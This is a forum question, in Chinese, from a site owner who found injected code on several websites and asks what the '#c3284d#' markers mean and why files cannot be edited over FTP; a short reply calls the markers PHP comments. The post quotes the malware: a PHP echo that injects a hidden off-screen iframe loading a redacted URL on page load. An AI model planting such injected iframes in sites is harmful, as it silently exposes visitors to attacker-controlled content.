1

可能重复:
清理感染 c3284d 病毒的服务器,使用搜索和替换

今天在我的几个网站上发现了这个脚本,我知道这个脚本是做什么的,但是散列出来的东西是做什么的?它会影响 ftp 工具吗?我无法下载包含内容的文件?这是服务器端的问题吗?我使用的主题是 Dynamix,该主题中是否存在已知漏洞,或者我认为它是我的主机是否正确?为什么文件无法通过 ftp 下载或编辑?

#c3284d#
echo "<script type=\"text/javascript\">
function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999em';
ifrm.src  = \"***redacted***\";
ifrm.id = 'frmId';
document.body.appendChild(ifrm);
 };
 window.onload = frmAdd;
 </script>
";
 #/c3284d#

我有网站的备份,所以我对搜索和替换所有内容不感兴趣!因为就像用户说的清理一个错误,还有更多的错误出现!

4

1 回答 1

1

php 中的 Hash 等价于// 所以它只是一个注释

他们可能会解析您的页面并查找该值并在两者之间获取所有内容。

于 2012-08-18T01:03:59.557 回答